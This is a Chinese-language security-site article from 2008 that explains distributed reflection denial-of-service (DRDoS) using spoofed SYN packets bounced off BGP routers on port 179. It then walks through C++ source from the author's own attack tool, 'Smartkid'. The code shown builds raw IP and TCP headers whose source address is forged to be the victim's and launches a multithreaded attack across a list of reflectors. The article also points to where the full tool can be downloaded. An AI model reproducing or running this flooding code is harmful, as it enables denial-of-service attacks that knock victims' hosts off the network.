科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道编程实现DRDoS攻击

编程实现DRDoS攻击

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

DRDoS是英文“Distributed Reflection Denial of Servie Attack”的缩写,意思是“分布式反射拒绝服务攻击”。DRDoS方式靠的是发送带有被害者IP地址的SYN连接请求包发给攻击主机BGP。根据TCP三次握手的规则,这些计算机会向源IP(被害者)发出SYN+ACK包来响应这个请求,造成该主机忙于处理这些回应而被拒绝服务攻击。

来源:论坛整理 2008年7月2日

关键字: 网络安全 攻击防范 Dos

  • 评论
  • 分享微博
  • 分享邮件
 

  DRDoS是英文“Distributed Reflection Denial of Servie Attack”的缩写,意思是“分布式反射拒绝服务攻击”。DRDoS方式靠的是发送带有被害者IP地址的SYN连接请求包发给攻击主机BGP。根据TCP三次握手的规则,这些计算机会向源IP(被害者)发出SYN+ACK包来响应这个请求,造成该主机忙于处理这些回应而被拒绝服务攻击。

  当被害者被多个网络核心基础设施路由器攻击,所有的连接都是完全合法的SYN/ACK连接回应包,它们显示了一个TCP源端口:179。BGP是中介路由器支持的“边界网关协议”(Border Gateway Protocol)。路由器使用BGP与它们的邻居进行即时的信息交流来交换它们的路由表,这是为了通知它们彼此路由器可以在哪个IP范围内进行转交。BGP的细节并不重要, 每个良好连接的中介器都会接受它们179端口上的连接。也就是说,任何一个SYN数据包到达一个网络路由器上后,都会引出一个该路由的SYN/ACK回应包来,从而利用BGP的特性实现反射放大洪水攻击。

  DRDoS与DDoS的不同之处就是不需要在实际攻击之前占领大量的傀儡机,发动DRDoS也只需花费攻击者很少的资源。这种攻击也是在伪造数据包源地址的情况下进行的,从这一点上来说,与Smurf攻击一样;而DRDoS是可以在广域网上进行的,其名称中的“R”意为反射,就是这种攻击行为最大的特点。

  代码实现

  为了实现DRDoS,我专门写了一个强大的综合利用工具Smartkid,实现了以下几个功能:多线程端口扫描、多线程DDoS攻击、多线程DRDoS攻击、ICMP洪水、SYN洪水、自动更新。这款工具已经开放了源代码,大家可以到www.dream2fly.net和www.xfocus.net下载,我随本文也提供了完整源代码。下面我主要根据代码来讲解一下DRDoS的实现原理,为了层次清楚,我删去了ICMP攻击部分,大家可以参看源代码。

  1)首先是初始化要发送的SYN数据报首部,这样攻击线程可以只需要修改少许参数,就能达到加快攻击速度的目的,具体实现代码如下所示。

void CDrdos::InitSynPacket()

  {     //填充IP首部

       memset((void *)&ipheader,0,sizeof(ipheader));

       ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long)); 

       ipheader.tos=0; 

       ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); 

       ipheader.ident=1; 

       ipheader.frag_and_flags=0x40;  

       ipheader.ttl=255;            //最大

       ipheader.proto=IPPROTO_TCP; 

       ipheader.checksum=0; 

       ipheader.sourceIP=inet_addr(m_target_ip);

       ipheader.destIP=inet_addr(m_target_ip);

       //填充TCP首部

       memset((void *)&tcpheader,0,sizeof(tcpheader));

       tcpheader.th_dport=htons(m_target_port); 

       tcpheader.th_sport=htons(m_target_port); 

       tcpheader.th_seq=htonl(rand()); 

       tcpheader.th_ack=0; 

       tcpheader.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); 

       tcpheader.th_flag=2;

       //syn 00000010,修改这里来实现不同的标志位探测,是SYN、是FIN,还是ACK探测

       tcpheader.th_win=htons(512); 

       tcpheader.th_urp=0; 

       tcpheader.th_sum=0; 

       //填充TCP伪首部,用来计算TCP头部的效验和

       memset((void *)&psdheader,0,sizeof(psdheader));

       psdheader.saddr=ipheader.sourceIP; 

       psdheader.daddr=ipheader.destIP; 

       psdheader.mbz=0; 

       psdheader.ptcl=IPPROTO_TCP; 

       psdheader.tcpl=htons(sizeof(TCP_HEADER));

  }

  2)在开始攻击函数start_drdos中启动一个drdosthread攻击线程:AfxBeginThread(drdosthread,NULL),实现UI层和业务层面的分离,从而提高UI反应速度。

void CDrdos::start_drdos(const vector<CString> &reflect_list)

{

m_listCounter=0;

m_ncounter=0;

m_pDlg=(CsmartkidDlg*)AfxGetApp()->GetMainWnd();

m_threadnum=m_pDlg->m_threadnum;

strcpy(m_target_ip,m_pDlg->m_targetip.GetBuffer());

m_target_port=m_pDlg->m_drdosport;

m_reflectlist=reflect_list;  //开始初始化数据包

InitSynPacket();

m_mainnum=m_reflectlist.size()/m_threadnum;

if(m_reflectlist.size()%m_threadnum > 0)

{

  m_mainnum++;

}

  m_pDlg->m_prog->SetRange(0,m_reflectlist.size());

m_pDlg->m_prog->SetStep(1);

AfxBeginThread(drdosthread,NULL);

}

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章